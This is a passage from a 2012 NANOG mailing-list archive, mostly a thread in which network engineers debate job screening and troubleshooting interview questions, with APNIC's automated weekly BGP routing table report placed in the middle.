> > Passion is also important, if you are willing to hire someone who is in it > > for just a paycheck, save yourself the headache and get a contractor. > > -- > > Sent from my Android phone with K-9 Mail. Please excuse my brevity. > > > > Matthew Palmer wrote: > > > > On Thu, Jul 05, 2012 at 11:04:05PM -0400, Robert E. Seastrom wrote: > > > Diogo Montagner writes: > > > > For screening questions (for 1st level filtering), IMO, the questions > > > > has to be straight to the point, for example: > > > > > > > > 1) What is the LSA number for an external route in OSPF? > > > > > > > > This can have two answer: 5 or 7. So, I will accept if the candidate > > > > answer 5, 7 or 5 and 7. Later on (the next level of the interview), a > > > > techinical interviewer will chech if the candidate understand the > > > > differences of LSA 5 and 7. > > > > > > Frankly, this feels a bit like asking what the 9th byte in an IP > > > header is used for (it's TTL, but who's, uh, counting?) -- "That's why > > > God gave us packet analyzers" should be counted as an acceptable > > > answer. If not, you'll find yourself skipping over plenty of > > > extremely well qualified candidates in favor of those who have crammed > > > recently for some sort of exam in hopes of compensating for their > > > short CV. > > > > Ugh, I know someone (thankfully no longer a current colleague) who ardently > > *defends* his use of questions like "what does the -M option to ps do?" on > > the basis that "any senior person who knows what they're doing should know > > all the options to ps!". No, you useless tit, anyone who knows what they're > > doing should know how to read a bloody manpage. > > > > Trivia tests get you hiring people who know trivia. Knowing trivia has it's > > productivity benefits, but if you can't apply it, it's useless. > > > > - Matt > > > > -- > > Politics and religion are just like software and hardware. They all suck, > > the documentation is provably incorrect, and all the vendors tell lies. > > -- Andrew Dalgleish, in the Monastery > > > > > > > > > -- > -Matt Chung From mpalmer at hezmatt.org Fri Jul 6 13:46:31 2012 From: mpalmer at hezmatt.org (Matthew Palmer) Date: Sat, 7 Jul 2012 04:46:31 +1000 Subject: job screening question In-Reply-To: <40593.1341587570@turing-police.cc.vt.edu> References: <86obntzj2y.fsf@seastrom.com> <20120706074242.GY2221@hezmatt.org> <40593.1341587570@turing-police.cc.vt.edu> Message-ID: <20120706184631.GA2221@hezmatt.org> On Fri, Jul 06, 2012 at 11:12:50AM -0400, valdis.kletnieks at vt.edu wrote: > On Fri, 06 Jul 2012 17:42:42 +1000, Matthew Palmer said: > > > Ugh, I know someone (thankfully no longer a current colleague) who ardently > > *defends* his use of questions like "what does the -M option to ps do?" on > > Is that an African ps or a European ps? ;) That was actually the reason why he picked on ps in particular -- because it had two completely different command sets and yes, he expects candidates to know the difference. - Matt -- Ideas are like rabbits. You get a couple and learn how to handle them, and pretty soon you have a dozen. -- John Steinbeck From owen at delong.com Fri Jul 6 13:53:28 2012 From: owen at delong.com (Owen DeLong) Date: Fri, 6 Jul 2012 11:53:28 -0700 Subject: job screening question In-Reply-To: <96c8cdf69d6c1b4784953994f4916287@mail.dessus.com> References: <96c8cdf69d6c1b4784953994f4916287@mail.dessus.com> Message-ID: <3D1AE150-8B79-4E39-88C2-C651F0DE21A2@delong.com> On Jul 6, 2012, at 11:41 AM, Keith Medcalf wrote: > > My response would be "insufficient information provided for meaningful diagnosis". > > The following could be issues: > ... the user does not have a computer > ... the computer is not turned on > ... the keyboard is not plugged in > ... the user is a quadraplegic and cannot use the mouse or keyboard > ... the user is blind and cannot find the computer > ... the user has a computer but is not connected to a network > ... the monitor is not turned on > ... the brightness is turned down too far on the monitor > ... the user is dead I would argue that the fact the user filed a ticket/contacted the helpdesk/whatever to raise the issue indicates that the user probably isn't dead. The rest are semi-legitimate somewhat amusing answers, but you missed many possibilities. When providing such a list of answers, always include an etc. at the end so as to indicate your understanding that the list is not complete. ;-) > How does the user know that it cannot access the web site? When did users become things? Probably a candidate that made this mistake should be dismissed from consideration on that basis alone. Owen > >> -----Original Message----- >> From: Matt Chung [mailto:itsmemattchung at gmail.com] >> Sent: Friday, 06 July, 2012 08:20 >> To: joseph.snyder at gmail.com >> Cc: nanog at nanog.org >> Subject: Re: job screening question >> >> A former manager of mine once told me you can gauge a persons understanding >> by the questions they ask and I personally agree with this statement. Most >> of us will be able to make a reasonable assessment of the person by >> listening to the content of their questions. I'm not looking for an >> immediate resolution, but trying to understand the thought process of the >> individual. I feel realistic scenarios provide some insight on the >> individual's analytical skills. >> >> "A client cannot access the website "http://xyz.com". What do you do to >> troubleshoot this issue?" >> >> Depending on the candidate, I've seen a variety of answers: >> 1) "Can you ping the device?" >> 2) "Can you access the gateway?" >> 3) "What does the running config look like on the router" >> 4) "Is there a firewall in between" >> >> I believe these questions may be asked in the right context provided there >> is enough information to isolate the issue to the network however the >> statement is devoid of anything useful that would make the network suspect. >> I would like to hear some questions such as: >> >> "are other websites accessible? Or is the only website the client is >> experiencing issues with?" >> "was the website working previously? when did it start happening?" >> "what does the client see on their screen ? are they getting an error?" >> >> These questions reflect the persons ability to accurately understand the >> problem before deep diving into the technical details. From there, you can >> get more technical. "Client is receiving an HTTP 404 error." Great, rule >> out network since this is an application layer response... >> >> just my .02. >> >> On Fri, Jul 6, 2012 at 8:28 AM, wrote: >> >>> I agree. Let the person talk do a few probing questions based off what >>> they say. If you yourself have any value you should be able to tell if they >>> have a chance. >>> >>> Also I would prefer someone who says I don't know for sure but maybe >>> something along these lines, and then wants to know the right answer. >>> Passion is also important, if you are willing to hire someone who is in it >>> for just a paycheck, save yourself the headache and get a contractor. >>> -- >>> Sent from my Android phone with K-9 Mail. Please excuse my brevity. >>> >>> Matthew Palmer wrote: >>> >>> On Thu, Jul 05, 2012 at 11:04:05PM -0400, Robert E. Seastrom wrote: >>>> Diogo Montagner writes: >>>>> For screening questions (for 1st level filtering), IMO, the questions >>>>> has to be straight to the point, for example: >>>>> >>>>> 1) What is the LSA number for an external route in OSPF? >>>>> >>>>> This can have two answer: 5 or 7. So, I will accept if the candidate >>>>> answer 5, 7 or 5 and 7. Later on (the next level of the interview), a >>>>> techinical interviewer will chech if the candidate understand the >>>>> differences of LSA 5 and 7. >>>> >>>> Frankly, this feels a bit like asking what the 9th byte in an IP >>>> header is used for (it's TTL, but who's, uh, counting?) -- "That's why >>>> God gave us packet analyzers" should be counted as an acceptable >>>> answer. If not, you'll find yourself skipping over plenty of >>>> extremely well qualified candidates in favor of those who have crammed >>>> recently for some sort of exam in hopes of compensating for their >>>> short CV. >>> >>> Ugh, I know someone (thankfully no longer a current colleague) who ardently >>> *defends* his use of questions like "what does the -M option to ps do?" on >>> the basis that "any senior person who knows what they're doing should know >>> all the options to ps!". No, you useless tit, anyone who knows what they're >>> doing should know how to read a bloody manpage. >>> >>> Trivia tests get you hiring people who know trivia. Knowing trivia has it's >>> productivity benefits, but if you can't apply it, it's useless. >>> >>> - Matt >>> >>> -- >>> Politics and religion are just like software and hardware. They all suck, >>> the documentation is provably incorrect, and all the vendors tell lies. >>> -- Andrew Dalgleish, in the Monastery >>> >>> >>> >> >> >> -- >> -Matt Chung > > > From kmedcalf at dessus.com Fri Jul 6 14:11:18 2012 From: kmedcalf at dessus.com (Keith Medcalf) Date: Fri, 06 Jul 2012 13:11:18 -0600 Subject: job screening question In-Reply-To: <3D1AE150-8B79-4E39-88C2-C651F0DE21A2@delong.com> Message-ID: > "A client cannot access the website "http://xyz.com" >> How does the user know that it cannot access the web site? > When did users become things? > Probably a candidate that made this mistake should be dismissed from > consideration on that basis alone. How do you know that the client is a person? --- () ascii ribbon campaign against html e-mail /\ www.asciiribbon.org From cscora at apnic.net Fri Jul 6 14:09:20 2012 From: cscora at apnic.net (Routing Analysis Role Account) Date: Sat, 7 Jul 2012 05:09:20 +1000 (EST) Subject: Weekly Routing Table Report Message-ID: <201207061909.q66J9Puj021411@thyme.rand.apnic.net> This is an automated weekly mailing describing the state of the Internet Routing Table as seen from APNIC's router in Japan. The posting is sent to APOPS, NANOG, AfNOG, AusNOG, SANOG, PacNOG, LacNOG, TRNOG, CaribNOG and the RIPE Routing Working Group. Daily listings are sent to bgp-stats at lists.apnic.net For historical data, please see http://thyme.rand.apnic.net. If you have any comments please contact Philip Smith . Routing Table Report 04:00 +10GMT Sat 07 Jul, 2012 Report Website: http://thyme.rand.apnic.net Detailed Analysis: http://thyme.rand.apnic.net/current/ Analysis Summary ---------------- BGP routing table entries examined: 416013 Prefixes after maximum aggregation: 175712 Deaggregation factor: 2.37 Unique aggregates announced to Internet: 202545 Total ASes present in the Internet Routing Table: 41442 Prefixes per ASN: 10.04 Origin-only ASes present in the Internet Routing Table: 33316 Origin ASes announcing only one prefix: 15667 Transit ASes present in the Internet Routing Table: 5555 Transit-only ASes present in the Internet Routing Table: 133 Average AS path length visible in the Internet Routing Table: 4.5 Max AS path length visible: 27 Max AS path prepend of ASN ( 51742) 24 Prefixes from unregistered ASNs in the Routing Table: 391 Unregistered ASNs in the Routing Table: 124 Number of 32-bit ASNs allocated by the RIRs: 2945 Number of 32-bit ASNs visible in the Routing Table: 2571 Prefixes from 32-bit ASNs in the Routing Table: 6623 Special use prefixes present in the Routing Table: 2 Prefixes being announced from unallocated address space: 166 Number of addresses announced to Internet: 2562615596 Equivalent to 152 /8s, 190 /16s and 105 /24s Percentage of available address space announced: 69.1 Percentage of allocated address space announced: 69.2 Percentage of available address space allocated: 99.9 Percentage of address space in use by end-sites: 93.1 Total number of prefixes smaller than registry allocations: 144059 APNIC Region Analysis Summary ----------------------------- Prefixes being announced by APNIC Region ASes: 101846 Total APNIC prefixes after maximum aggregation: 32701 APNIC Deaggregation factor: 3.11 Prefixes being announced from the APNIC address blocks: 102276 Unique aggregates announced from the APNIC address blocks: 42093 APNIC Region origin ASes present in the Internet Routing Table: 4713 APNIC Prefixes per ASN: 21.70 APNIC Region origin ASes announcing only one prefix: 1240 APNIC Region transit ASes present in the Internet Routing Table: 752 Average APNIC Region AS path length visible: 4.6 Max APNIC Region AS path length visible: 24 Number of APNIC region 32-bit ASNs visible in the Routing Table: 243 Number of APNIC addresses announced to Internet: 704055168 Equivalent to 41 /8s, 247 /16s and 7 /24s Percentage of available APNIC address space announced: 82.3 APNIC AS Blocks 4608-4864, 7467-7722, 9216-10239, 17408-18431 (pre-ERX allocations) 23552-24575, 37888-38911, 45056-46079, 55296-56319, 58368-59391, 131072-133119 APNIC Address Blocks 1/8, 14/8, 27/8, 36/8, 39/8, 42/8, 43/8, 49/8, 58/8, 59/8, 60/8, 61/8, 101/8, 103/8, 106/8, 110/8, 111/8, 112/8, 113/8, 114/8, 115/8, 116/8, 117/8, 118/8, 119/8, 120/8, 121/8, 122/8, 123/8, 124/8, 125/8, 126/8, 133/8, 150/8, 153/8, 163/8, 171/8, 175/8, 180/8, 182/8, 183/8, 202/8, 203/8, 210/8, 211/8, 218/8, 219/8, 220/8, 221/8, 222/8, 223/8, ARIN Region Analysis Summary ---------------------------- Prefixes being announced by ARIN Region ASes: 152288 Total ARIN prefixes after maximum aggregation: 77420 ARIN Deaggregation factor: 1.97 Prefixes being announced from the ARIN address blocks: 153251 Unique aggregates announced from the ARIN address blocks: 68354 ARIN Region origin ASes present in the Internet Routing Table: 15188 ARIN Prefixes per ASN: 10.09 ARIN Region origin ASes announcing only one prefix: 5754 ARIN Region transit ASes present in the Internet Routing Table: 1599 Average ARIN Region AS path length visible: 4.0 Max ARIN Region AS path length visible: 24 Number of ARIN region 32-bit ASNs visible in the Routing Table: 17 Number of ARIN addresses announced to Internet: 1070644608 Equivalent to 63 /8s, 208 /16s and 189 /24s Percentage of available ARIN address space announced: 56.6 ARIN AS Blocks 1-1876, 1902-2042, 2044-2046, 2048-2106 (pre-ERX allocations) 2138-2584, 2615-2772, 2823-2829, 2880-3153 3354-4607, 4865-5119, 5632-6655, 6912-7466 7723-8191, 10240-12287, 13312-15359, 16384-17407 18432-20479, 21504-23551, 25600-26591, 26624-27647, 29696-30719, 31744-33791 35840-36863, 39936-40959, 46080-47103 53248-55295, 393216-394239 ARIN Address Blocks 3/8, 4/8, 6/8, 7/8, 8/8, 9/8, 11/8, 12/8, 13/8, 15/8, 16/8, 17/8, 18/8, 19/8, 20/8, 21/8, 22/8, 23/8, 24/8, 26/8, 28/8, 29/8, 30/8, 32/8, 33/8, 34/8, 35/8, 38/8, 40/8, 44/8, 45/8, 47/8, 48/8, 50/8, 52/8, 53/8, 54/8, 55/8, 56/8, 57/8, 63/8, 64/8, 65/8, 66/8, 67/8, 68/8, 69/8, 70/8, 71/8, 72/8, 73/8, 74/8, 75/8, 76/8, 96/8, 97/8, 98/8, 99/8, 100/8, 104/8, 107/8, 108/8, 128/8, 129/8, 130/8, 131/8, 132/8, 134/8, 135/8, 136/8, 137/8, 138/8, 139/8, 140/8, 142/8, 143/8, 144/8, 146/8, 147/8, 148/8, 149/8, 152/8, 155/8, 156/8, 157/8, 158/8, 159/8, 160/8, 161/8, 162/8, 164/8, 165/8, 166/8, 167/8, 168/8, 169/8, 170/8, 172/8, 173/8, 174/8, 184/8, 192/8, 198/8, 199/8, 204/8, 205/8, 206/8, 207/8, 208/8, 209/8, 214/8, 215/8, 216/8, RIPE Region Analysis Summary ---------------------------- Prefixes being announced by RIPE Region ASes: 103875 Total RIPE prefixes after maximum aggregation: 55073 RIPE Deaggregation factor: 1.89 Prefixes being announced from the RIPE address blocks: 106098 Unique aggregates announced from the RIPE address blocks: 67054 RIPE Region origin ASes present in the Internet Routing Table: 16647 RIPE Prefixes per ASN: 6.37 RIPE Region origin ASes announcing only one prefix: 8073 RIPE Region transit ASes present in the Internet Routing Table: 2689 Average RIPE Region AS path length visible: 5.0 Max RIPE Region AS path length visible: 27 Number of RIPE region 32-bit ASNs visible in the Routing Table: 1694 Number of RIPE addresses announced to Internet: 635393668 Equivalent to 37 /8s, 223 /16s and 86 /24s Percentage of available RIPE address space announced: 92.4 RIPE AS Blocks 1877-1901, 2043, 2047, 2107-2136, 2585-2614 (pre-ERX allocations) 2773-2822, 2830-2879, 3154-3353, 5377-5631 6656-6911, 8192-9215, 12288-13311, 15360-16383 20480-21503, 24576-25599, 28672-29695 30720-31743, 33792-35839, 38912-39935 40960-45055, 47104-52223, 56320-58367 59392-61439, 196608-199679 RIPE Address Blocks 2/8, 5/8, 25/8, 31/8, 37/8, 46/8, 51/8, 62/8, 77/8, 78/8, 79/8, 80/8, 81/8, 82/8, 83/8, 84/8, 85/8, 86/8, 87/8, 88/8, 89/8, 90/8, 91/8, 92/8, 93/8, 94/8, 95/8, 109/8, 141/8, 145/8, 151/8, 176/8, 178/8, 185/8, 188/8, 193/8, 194/8, 195/8, 212/8, 213/8, 217/8, LACNIC Region Analysis Summary ------------------------------ Prefixes being announced by LACNIC Region ASes: 41993 Total LACNIC prefixes after maximum aggregation: 8342 LACNIC Deaggregation factor: 5.03 Prefixes being announced from the LACNIC address blocks: 44613 Unique aggregates announced from the LACNIC address blocks: 21657 LACNIC Region origin ASes present in the Internet Routing Table: 1608 LACNIC Prefixes per ASN: 27.74 LACNIC Region origin ASes announcing only one prefix: 429 LACNIC Region transit ASes present in the Internet Routing Table: 310 Average LACNIC Region AS path length visible: 4.6 Max LACNIC Region AS path length visible: 25 Number of LACNIC region 32-bit ASNs visible in the Routing Table: 612 Number of LACNIC addresses announced to Internet: 111736744 Equivalent to 6 /8s, 168 /16s and 247 /24s Percentage of available LACNIC address space announced: 66.6 LACNIC AS Blocks 26592-26623, 27648-28671, 52224-53247, 262144-263167 plus ERX transfers LACNIC Address Blocks 177/8, 179/8, 181/8, 186/8, 187/8, 189/8, 190/8, 191/8, 200/8, 201/8, AfriNIC Region Analysis Summary ------------------------------- Prefixes being announced by AfriNIC Region ASes: 9191 Total AfriNIC prefixes after maximum aggregation: 2121 AfriNIC Deaggregation factor: 4.33 Prefixes being announced from the AfriNIC address blocks: 9609 Unique aggregates announced from the AfriNIC address blocks: 3242 AfriNIC Region origin ASes present in the Internet Routing Table: 548 AfriNIC Prefixes per ASN: 17.53 AfriNIC Region origin ASes announcing only one prefix: 171 AfriNIC Region transit ASes present in the Internet Routing Table: 124 Average AfriNIC Region AS path length visible: 4.6 Max AfriNIC Region AS path length visible: 25 Number of AfriNIC region 32-bit ASNs visible in the Routing Table: 5 Number of AfriNIC addresses announced to Internet: 40489728 Equivalent to 2 /8s, 105 /16s and 211 /24s Percentage of available AfriNIC address space announced: 40.2 AfriNIC AS Blocks 36864-37887, 327680-328703 & ERX transfers AfriNIC Address Blocks 41/8, 102/8, 105/8, 154/8, 196/8, 197/8, APNIC Region per AS prefix count summary ---------------------------------------- ASN No of nets /20 equiv MaxAgg Description 4766 2689 11116 1201 Korea Telecom (KIX) 17974 2146 558 79 PT TELEKOMUNIKASI INDONESIA 7545 1690 301 87 TPG Internet Pty Ltd 4755 1612 388 162 TATA Communications formerly 9829 1300 1085 28 BSNL National Internet Backbo 9583 1165 87 507 Sify Limited 7552 1124 1062 11 Vietel Corporation 4808 1100 2053 318 CNCGROUP IP network: China169 24560 1036 385 165 Bharti Airtel Ltd., Telemedia 9498 978 291 65 BHARTI Airtel Ltd. Complete listing at http://thyme.rand.apnic.net/current/data-ASnet-APNIC ARIN Region per AS prefix count summary --------------------------------------- ASN No of nets /20 equiv MaxAgg Description 6389 3392 3789 188 bellsouth.net, inc. 7029 3260 986 161 Windstream Communications Inc 18566 2089 382 182 Covad Communications 1785 1931 681 132 PaeTec Communications, Inc. 22773 1656 2911 121 Cox Communications, Inc. 20115 1651 1573 616 Charter Communications 4323 1575 1043 384 Time Warner Telecom 30036 1382 264 783 Mediacom Communications Corp 7018 1259 10029 824 AT&T WorldNet Services 11492 1190 216 356 Cable One Complete listing at http://thyme.rand.apnic.net/current/data-ASnet-ARIN RIPE Region per AS prefix count summary --------------------------------------- ASN No of nets /20 equiv MaxAgg Description 8402 1628 544 16 Corbina telecom 2118 1288 97 14 EUnet/RELCOM Autonomous Syste 12479 781 731 91 Uni2 Autonomous System 34984 725 189 176 BILISIM TELEKOM 6830 711 2292 445 UPC Distribution Services 31148 695 37 9 FreeNet ISP 20940 685 220 527 Akamai Technologies European 8551 579 364 61 Bezeq International 13188 504 100 10 Educational Network 3320 496 8443 408 Deutsche Telekom AG Complete listing at http://thyme.rand.apnic.net/current/data-ASnet-RIPE LACNIC Region per AS prefix count summary ----------------------------------------- ASN No of nets /20 equiv MaxAgg Description 28573 1989 1214 55 NET Servicos de Comunicao S.A 10620 1983 345 204 TVCABLE BOGOTA 6503 1531 418 66 AVANTEL, S.A. 8151 1489 3065 342 UniNet S.A. de C.V. 7303 1453 933 193 Telecom Argentina Stet-France 27947 709 74 94 Telconet S.A 11172 643 91 74 Servicios Alestra S.A de C.V 3816 589 246 90 Empresa Nacional de Telecomun 22047 583 326 15 VTR PUNTO NET S.A. 14117 567 65 59 Telefonica del Sur S.A. Complete listing at http://thyme.rand.apnic.net/current/data-ASnet-LACNIC AfriNIC Region per AS prefix count summary ------------------------------------------ ASN No of nets /20 equiv MaxAgg Description 8452 1222 958 13 TEDATA 24863 864 274 32 LINKdotNET AS number 6713 504 649 18 Itissalat Al-MAGHRIB 24835 286 80 8 RAYA Telecom - Egypt 3741 262 905 223 The Internet Solution 33776 199 12 21 Starcomms Nigeria Limited 12258 197 28 62 Vodacom Internet Company 16637 167 664 87 MTN Network Solutions 29975 167 571 19 Vodacom 15706 159 32 6 Sudatel Internet Exchange Aut Complete listing at http://thyme.rand.apnic.net/current/data-ASnet-AFRINIC Global Per AS prefix count summary ---------------------------------- ASN No of nets /20 equiv MaxAgg Description 6389 3392 3789 188 bellsouth.net, inc. 7029 3260 986 161 Windstream Communications Inc 4766 2689 11116 1201 Korea Telecom (KIX) 17974 2146 558 79 PT TELEKOMUNIKASI INDONESIA 18566 2089 382 182 Covad Communications 28573 1989 1214 55 NET Servicos de Comunicao S.A 10620 1983 345 204 TVCABLE BOGOTA 1785 1931 681 132 PaeTec Communications, Inc. 7545 1690 301 87 TPG Internet Pty Ltd 22773 1656 2911 121 Cox Communications, Inc. Complete listing at http://thyme.rand.apnic.net/current/data-ASnet Global Per AS Maximum Aggr summary ---------------------------------- ASN No of nets Net Savings Description 7029 3260 3099 Windstream Communications Inc 17974 2146 2067 PT TELEKOMUNIKASI INDONESIA 28573 1989 1934 NET Servicos de Comunicao S.A 18566 2089 1907 Covad Communications 1785 1931 1799 PaeTec Communications, Inc. 10620 1983 1779 TVCABLE BOGOTA 8402 1628 1612 Corbina telecom 7545 1690 1603 TPG Internet Pty Ltd 22773 1656 1535 Cox Communications, Inc. 4766 2689 1488 Korea Telecom (KIX) Complete listing at http://thyme.rand.apnic.net/current/data-CIDRnet List of Unregistered Origin ASNs (Global) ----------------------------------------- Bad AS Designation Network Transit AS Description 15132 UNALLOCATED 12.9.150.0/24 7018 AT&T WorldNet Servic 25639 UNALLOCATED 12.41.169.0/24 7018 AT&T WorldNet Servic 13317 UNALLOCATED 12.44.10.0/24 7018 AT&T WorldNet Servic 23502 UNALLOCATED 12.44.44.0/24 7018 AT&T WorldNet Servic 17300 UNALLOCATED 12.45.103.0/24 7018 AT&T WorldNet Servic 17300 UNALLOCATED 12.45.110.0/24 701 UUNET Technologies, 16476 UNALLOCATED 12.46.27.0/24 7018 AT&T WorldNet Servic 14764 UNALLOCATED 12.108.237.0/24 7018 AT&T WorldNet Servic 33649 UNALLOCATED 12.111.112.0/24 19029 New Edge Networks 29760 UNALLOCATED 12.145.34.0/23 7018 AT&T WorldNet Servic Complete listing at http://thyme.rand.apnic.net/current/data-badAS Prefixes from private and non-routed address space (Global) ----------------------------------------------------------- Prefix Origin AS Description 128.0.0.0/21 12654 RIPE NCC RIS Project 128.0.24.0/24 12654 RIPE NCC RIS Project Complete listing at http://thyme.rand.apnic.net/current/data-dsua Advertised Unallocated Addresses -------------------------------- Network Origin AS Description 14.192.0.0/22 45464 Room 201, TGU Bldg 14.192.4.0/22 45464 Room 201, TGU Bldg 14.192.8.0/22 45464 Room 201, TGU Bldg 14.192.12.0/22 45464 Room 201, TGU Bldg 14.192.16.0/22 45464 Room 201, TGU Bldg 14.192.20.0/22 45464 Room 201, TGU Bldg 14.192.24.0/22 45464 Room 201, TGU Bldg 14.192.28.0/22 45464 Room 201, TGU Bldg 27.112.114.0/24 23884 Proimage Engineering and Comm 62.61.220.0/24 24974 Tachyon Europe BV - Wireless Complete listing at http://thyme.rand.apnic.net/current/data-add-IANA Number of prefixes announced per prefix length (Global) ------------------------------------------------------- /1:0 /2:0 /3:0 /4:0 /5:0 /6:0 /7:0 /8:19 /9:12 /10:28 /11:82 /12:236 /13:469 /14:841 /15:1521 /16:12308 /17:6376 /18:10769 /19:20908 /20:29682 /21:31424 /22:41182 /23:39084 /24:217243 /25:1224 /26:1473 /27:857 /28:169 /29:65 /30:18 /31:0 /32:23 Advertised prefixes smaller than registry allocations ----------------------------------------------------- ASN No of nets Total ann. Description 7029 2632 3260 Windstream Communications Inc 18566 2039 2089 Covad Communications 6389 1871 3392 bellsouth.net, inc. 8402 1323 1628 Corbina telecom 30036 1319 1382 Mediacom Communications Corp 11492 1153 1190 Cable One 22773 1087 1656 Cox Communications, Inc. 6503 1058 1531 AVANTEL, S.A. 1785 1042 1931 PaeTec Communications, Inc. 8452 998 1222 TEDATA Complete listing at http://thyme.rand.apnic.net/current/data-sXXas-nos Number of /24s announced per /8 block (Global) ---------------------------------------------- 1:574 2:735 3:1 4:13 5:131 6:3 8:433 12:2008 13:1 14:636 15:12 16:3 17:5 20:24 23:180 24:1776 27:1313 31:998 32:56 33:2 34:2 36:9 37:591 38:821 39:1 40:128 41:3062 42:142 44:3 46:1470 47:2 49:418 50:547 52:13 54:13 55:6 56:1 57:34 58:978 59:528 60:249 61:1297 62:967 63:2037 64:4257 65:2255 66:4486 67:2051 68:1154 69:3191 70:980 71:510 72:1837 74:2594 75:475 76:332 77:931 78:887 79:487 80:1213 81:947 82:660 83:529 84:494 85:1171 86:432 87:934 88:341 89:1749 90:301 91:5010 92:580 93:1360 94:1596 95:1220 96:379 97:318 98:889 99:39 100:19 101:253 103:1235 106:101 107:188 108:363 109:1428 110:785 111:940 112:420 113:634 114:653 115:904 116:930 117:729 118:926 119:1228 120:352 121:809 122:1674 123:1084 124:1397 125:1267 128:554 129:188 130:263 131:615 132:300 133:22 134:244 135:61 136:217 137:240 138:337 139:175 140:494 141:266 142:429 143:370 144:529 145:77 146:518 147:288 148:769 149:318 150:157 151:182 152:474 153:176 154:17 155:433 156:220 157:382 158:191 159:621 160:342 161:268 162:376 163:192 164:658 165:415 166:584 167:479 168:908 169:126 170:893 171:145 172:5 173:1730 174:617 175:438 176:564 177:924 178:1533 180:1290 181:99 182:1025 183:239 184:533 185:1 186:1918 187:1079 188:1355 189:1590 190:5739 192:6010 193:5521 194:4532 195:3430 196:1189 197:170 198:3673 199:4848 200:5911 201:1977 202:8701 203:8638 204:4325 205:2532 206:2800 207:2801 208:4028 209:3618 210:2780 211:1549 212:2003 213:1908 214:880 215:82 216:5071 217:1554 218:552 219:338 220:1237 221:568 222:337 223:357 End of report From kmedcalf at dessus.com Fri Jul 6 14:16:18 2012 From: kmedcalf at dessus.com (Keith Medcalf) Date: Fri, 06 Jul 2012 13:16:18 -0600 Subject: job screening question In-Reply-To: Message-ID: <261c1042fd294e4da35a00b5f95a154f@mail.dessus.com> > > "A client cannot access the website "http://xyz.com" > > >> How does the user know that it cannot access the web site? > > > When did users become things? > > > Probably a candidate that made this mistake should be dismissed from > > consideration on that basis alone. > > How do you know that the client is a person? Perhaps "What language is the client written in, and what Operating System is it running on?" would be a better response. --- () ascii ribbon campaign against html e-mail /\ www.asciiribbon.org From tyler.haske at gmail.com Fri Jul 6 14:23:37 2012 From: tyler.haske at gmail.com (Tyler Haske) Date: Fri, 6 Jul 2012 15:23:37 -0400 Subject: job screening question In-Reply-To: <261c1042fd294e4da35a00b5f95a154f@mail.dessus.com> References: <261c1042fd294e4da35a00b5f95a154f@mail.dessus.com> Message-ID: DNA; Homo Sapien. Smart questions get smart answers. If you want HR to test technical knowledge just make a multiple choice test. (Course then you open a new can of worms). On Jul 6, 2012 3:16 PM, "Keith Medcalf" wrote: > > > > > "A client cannot access the website "http://xyz.com" > > > > >> How does the user know that it cannot access the web site? > > > > > When did users become things? > > > > > Probably a candidate that made this mistake should be dismissed from > > > consideration on that basis alone. > > > > How do you know that the client is a person? > > Perhaps "What language is the client written in, and what Operating System is it running on?" would be a better response. > > --- > () ascii ribbon campaign against html e-mail > /\ www.asciiribbon.org > > > > From eesslinger at fpu-tn.com Fri Jul 6 14:25:07 2012 From: eesslinger at fpu-tn.com (Eric J Esslinger) Date: Fri, 6 Jul 2012 14:25:07 -0500 Subject: job screening question In-Reply-To: <3D1AE150-8B79-4E39-88C2-C651F0DE21A2@delong.com> References: <96c8cdf69d6c1b4784953994f4916287@mail.dessus.com>, <3D1AE150-8B79-4E39-88C2-C651F0DE21A2@delong.com> Message-ID: <2730A40A53ADE9418D5F58E734953DF42B014C4AE5@exchange.corp.fpu-tn.com> I've dealt with: 1, (yes, no comp, tablet, game console, or other device, other than non-internet capable HDTV. They had also just purchased our fastest service package. They got irate said were switching to our competitor, who were cheaper anyway. Good news for them, we don't do minimum service contracts. Bad news for them, the competitor does. ) 2, 3, 6, 7, 8 also 'user has no power but computer is on UPS or generator and network gear is not'. More than once in most cases. Lots and lots of laptops with wireless card switch flipped to off accidently. And while I've never had a user call because they are unable to access a website because they are dead, I have had a non-user call/email about receiving NDR emails regarding email boxes belonging to one of our users we removed after notification that the owner was deceased. That's happened a few times. My call on dealing with that was something along the lines of 'That email address has either been changed or the account associated with it disconnected, and we are not at liberty to discuss the issue further due to customer privacy policies' which is exactly what I say when the other possibilities are true. Actually I had something similar to 'the user is dead'. Guy calls in to complain his internet is down. We dig through our system, no record he's a customer. After lots of hemming and hawing, admits he leeches unsecured wireless connection off next door neighbor. Next door neighbor's next of kin just had cable/internet turned off as she passed away, left power on while the move stuff out of house, so wireless signal was still present. For a while I had 3 businesses in the same building that shared the same internet connection; However only one was listed on the account/paid the bill. Problem A) slow internet (metrics showing that their inbound or outbound is pegged, also the company paying bought the cheapest package available) Problem B) Cross business compromising of information, printing stuff in other offices (two of them were even direct competitors, effectivly) sharing drives across bussinesses, a virus outbreak that kept respreading through the network because one office didn't seem to care they had a worm, and C) company that owned/paid for connection had a tendancy to ignore late notices, because of billing schedule stuff the cutoff's would happen on Thursday, the person at that company with the authority to write checks only worked Mon-Wed ________________________________________ From: Owen DeLong [owen at delong.com] Sent: Friday, July 06, 2012 1:53 PM To: Keith Medcalf Cc: nanog at nanog.org Subject: Re: job screening question On Jul 6, 2012, at 11:41 AM, Keith Medcalf wrote: > > My response would be "insufficient information provided for meaningful diagnosis". > > The following could be issues: > ... the user does not have a computer > ... the computer is not turned on > ... the keyboard is not plugged in > ... the user is a quadraplegic and cannot use the mouse or keyboard > ... the user is blind and cannot find the computer > ... the user has a computer but is not connected to a network > ... the monitor is not turned on > ... the brightness is turned down too far on the monitor > ... the user is dead I would argue that the fact the user filed a ticket/contacted the helpdesk/whatever to raise the issue indicates that the user probably isn't dead. The rest are semi-legitimate somewhat amusing answers, but you missed many possibilities. When providing such a list of answers, always include an etc. at the end so as to indicate your understanding that the list is not complete. ;-) > How does the user know that it cannot access the web site? When did users become things? Probably a candidate that made this mistake should be dismissed from consideration on that basis alone. Owen > >> -----Original Message----- >> From: Matt Chung [mailto:itsmemattchung at gmail.com] >> Sent: Friday, 06 July, 2012 08:20 >> To: joseph.snyder at gmail.com >> Cc: nanog at nanog.org >> Subject: Re: job screening question >> >> A former manager of mine once told me you can gauge a persons understanding >> by the questions they ask and I personally agree with this statement. Most >> of us will be able to make a reasonable assessment of the person by >> listening to the content of their questions. I'm not looking for an >> immediate resolution, but trying to understand the thought process of the >> individual. I feel realistic scenarios provide some insight on the >> individual's analytical skills. >> >> "A client cannot access the website "http://xyz.com". What do you do to >> troubleshoot this issue?" >> >> Depending on the candidate, I've seen a variety of answers: >> 1) "Can you ping the device?" >> 2) "Can you access the gateway?" >> 3) "What does the running 